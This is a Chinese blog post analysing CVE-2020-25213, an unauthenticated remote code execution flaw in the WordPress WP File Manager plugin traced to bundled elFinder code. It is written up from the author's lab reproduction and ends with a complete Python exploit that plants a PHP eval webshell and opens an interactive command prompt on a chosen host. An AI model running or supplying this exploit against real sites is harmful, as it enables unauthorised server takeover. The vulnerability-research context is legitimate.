WordPress文件管理器插件0day漏洞解析-CVE-2020-25213

最新推荐文章于 2024-04-30 09:17:39 发布
最新推荐文章于 2024-04-30 09:17:39 发布
阅读量2.1k 收藏 4
点赞数 1
分类专栏: 安全 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ordar123/article/details/108614611
版权

WordPress文件管理器插件0day漏洞解析-CVE-2020-25213

昨天好多安全平台发布了WordPress插件WP File Manager的0day漏洞预警,然后我怀着好奇的心情解析了一波,花了些时间总算是解开了这个漏洞的神秘面纱。

image-20200904123421209

从预警中可以看到漏洞在/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php,然后里面的 关键代码说实话我一开始没看懂,大概意思就是两个文件包含,然后下面run elFinder。

为了弄懂这个我下载了WP File Manager插件6.0版本:下载地址https://wordpress.org/plugins/wp-file-manager/advanced/

然后搭建了一个WordPress5.3.2,用phpstrom调试审计这个插件。

先看了两个文件包含,其中一个./vendor/autoload.php文件是不存在的,另一个autoload.php也没什么特别的东西。

然后往下看,在然后我被41行这个给误导了

image-20200904123940637

因为断点调试到这一行,就会跳转到一个叫elFinderConnector.class.php的文件里,然后在这个文件160行发现exec()函数,我以为关键点就在这里,然后一直研究这个函数,然后并没有什么实际发现。。。

image-20200904124017319

然后 我开始怀疑人生,可能是我太菜了吧,挖不到漏洞,别人都说了这里有0day我都挖不到,我也太菜了吧。。。

当我快要放弃的时候,我又看了一眼漏洞预警,其中几个字打开了我的思路,“这段代码来自elFinder项目”,这个意思是不是说WP File Manager插件使用了elFinder项目的代码,然后elFinder有漏洞。

image-20200904124600592

于是,我又去百度elFinder漏洞

image-20200904124821961

emmmmmmm。。。。。竟然真有漏洞,还是个CVE,CVE-2019-9194

漏洞原理啥的没细看,这里贴一下https://xz.aliyun.com/t/4444

然后我就找找有没有poc可以用,从exp-db上搜索elFinder,发现一个远程代码执行的链接,打开看看。

发现里面的存在漏洞的文件connector.php跟预警的文件connector.minimal.php挺像的,因为connector.minimal.php是示例文件所以是示例名,实际上正式项目要改成connector.php。应该是这个意思

image-20200904125222615

然后就下载这个poc来验证我搭建的环境。

image-20200904125057545

因为前面说了那个WP File Manager插件的作者直接搬运了elFinder的代码,所以连示例文件的名字都没有改,所以要稍微修改一下poc,将connector.php改成connector.minimal.php,然后将一句话改为eval,同时为方便调试将print的注释去掉

image-20200904125955530

下面是漏洞验证环节:

image-20200904130043754

可以看到在\wp-content\plugins\wp-file-manager\lib\files目录下成功生成了文件,内容为一句话。与漏洞预警中说明的目录是一样的。

image-20200904130332443

image-20200904130205479

image-20200904130434805

image-20200904130603094

以上操作都是在未登录的情况下,也就是说是未授权RCE。这里贴一下poc

#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
#    03-05-2015:Vulnerability Discovered
#    03-05-2015:Contacted Vendor
#    04-05-2015:No response
#    05-05-2015:No response
#    06-05-2015:No response
#    06-05-2015:Vulnerability published

import cookielib, urllib
import urllib2
import sys

print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20|                 TUNISIAN CYBER                  |"
print"\x20\x20+-------------------------------------------------+"


host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')


tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))

create = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
print create.read()

payload = urllib.urlencode({
                            'cmd' : 'put',
                            'target' : 'l1_'+evilfile.encode('base64','strict'),
                            'content' : '<?php eval($_GET[\'cmd\']); ?>'
                            })

write = opener.open('http://'+host+'/'+path+'/php/connector.minimal.php', payload)
#print write.read()
print '\n'
while True:
    try:
        cmd = raw_input('[She3LL]:~# ')

        execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
        reverse = execute.read()
        print reverse;

        if cmd.strip() == 'exit':
            break

    except Exception:
        break

sys.exit()

这里更新pocsuit版本

https://blog.csdn.net/ordar123/article/details/110670335

ordar123
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-25213 —— WordPress wp-file-manager 文件上传漏洞
战神/calmness的博客
12-10 8402
CVE-2020-25213 | WordPress wp-file-manager 文件上传漏洞 WordPress 插件WP-file-manager介绍 WP-file-manager是一个帮助WordPress管理员管理其站点上文件插件。该插件包含一个附加库elFinder,它是一个开放源代码文件管理器,用来创建简单的文件管理界面,并提供文件管理器背后的核心功能。WP-file-manager插件以引入漏洞的方式使用了该库。 描述 WordPress 6.9之前的文件管理器(wp-fi
WordPress爆炸性0day,直接RCE!附POC
m0_52514790的博客
02-24 1053
2.漏洞路径为:/wp-json/bricks/v1/render_element,然后使用构造好的POC进行nonce的替换,直接进行命令执行,获取服务器敏感信息以及进行敏感操作。其中执行的命令可以根据自己的需要进行更改即可。1.首先访问存在WordPress Bricks Builder 插件的网站,然后右键查看网页源代码或者使用抓包工具抓取返回的数据包,直接搜索参数nonce,获取其参数值。
WordPress wp-file-manager 文件上传漏洞 CVE-2020-25213
hongduilanjun的博客
09-13 703
直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的 id。直接访问 http://127.0.0.1/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php 可以看到响应的对象。如果 $cmd 为 upload,exec方法 就调用 elFinder类 的 upload方法 了。
0day-未公开-WordPress AI Engine文件上传致RCE漏洞
最新发布
weixin_43167326的博客
04-30 638
WordPress CMS 上的网站数以亿计,该平台及其用户称为威胁行动者的庞大攻击面,因此常常是恶意攻击的目标。其中很多攻击通过插件安装恶意软件,轻松导致数千个甚至数百万个站点易遭攻击。攻击者还倾向于快速利用WordPress 中发现的漏洞
php组件漏洞
赵花花08042的博客
07-27 562
通常我们调用一个php中的方法,比如这样一个函数方法localAdd(10,20),localAdd方法的具体实现要么是用户自己定义的,要么是php库函数中自带的,也就说在localAdd方法的代码实现在本地,它是一个本地调用!3、B接受A发送过来的字节流,然后反序列化得到目标方法名,方法参数,接着执行相应的方法调用(可能是localAdd)并把结果30返回;扩展,按照官网的描述,可以安装也可以不安装,不安装phprpc也是可以运行的。然后就可以非常方便的去使用第三方的类库了,是不是感觉很棒啊!...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8811
cms漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2018-20555:社交网络选项卡Wordpress插件漏洞-CVE-2018-20555
02-05
CVE-2018-20555 由Design Chemical公司生产的名为的Wordpress插件泄漏了其用户的Twitter access_token,access_token_secret,consumer_key和consumer_secret两次,这导致其Twitter帐户被接管。 这是由显示Twitter小...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
wordpress漏洞_多个WordPress插件SQL注入漏洞分析
weixin_39702714的博客
12-12 652
背景SQL注入漏洞是用来构建SQL查询的用户输入未经适当处理导致的漏洞。比如:图1: 使用WordPress的SQL查询示例从上面的代码来看,其中存在SQL注入攻击漏洞,因为从$_GET中提取的$_id在传递给SQL查询时没有经过任何处理。在最新的WordPress版本中,默认会在$_POST/$_GET/$_REQUEST/$_COOKIE中加入了magic quotes。这可以帮助...
网络防御与对抗-wp漏洞利用
网络安全领域优质创作者
11-05 820
wpscan-u http://10.11.1.251/wp/ --enumeratevpvt是扫描主题漏洞 扫描插件漏洞 wp-forum - SQL Injection 参考连接:Wordpress wp-forum plugin SQL Injection - CXSecurity.com http://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_c...
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2660
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8073
多次跳转导致的ssrf
CVE-2020-1350: Windows DNS Server蠕虫级远程代码执行漏洞分析
爱国小白帽
07-18 4608
360-CERT [三六零CERT](javascript:void(0)???? 昨天 0x00 漏洞背景 Windows DNS Server远程代码执行漏洞CVE-2020-1350):未经身份验证的攻击者可通过向目标DNS服务器发送特制数据包从而目标系统上以本地SYSTEM账户权限执行任意代码。该漏洞无需交互、不需要身份认证且Windows DNS Server默认配置可触发,攻击场景如下: (注:图来自互联网) 利用场景1: (1)受害者访问攻击者域名"evil.server.io" (2)
php漏洞怎么回事,PHP漏洞总结
weixin_29466339的博客
03-11 453
基础漏洞、弱类型、伪协议、反序列化基础知识补漏php类型转换机制php是一种弱类型语言,它支持的类型有:boolean,integer,float,string,array,object,callable,resource,NULL类型之间转换可能会发生一些有趣的事情,总结如下:转化成boolean""(空字符串),"0"(字符串零),0(整型零),0.0(浮点零),array()(空数组),NU...
WordPress漏洞之————SQL注入漏洞与提权分析
Fly_鹏程万里
03-30 5956
威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问题,但是却没有像他blog中所说的那样可以通过订阅者这样的低权限来触发SQL注入漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ordar123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值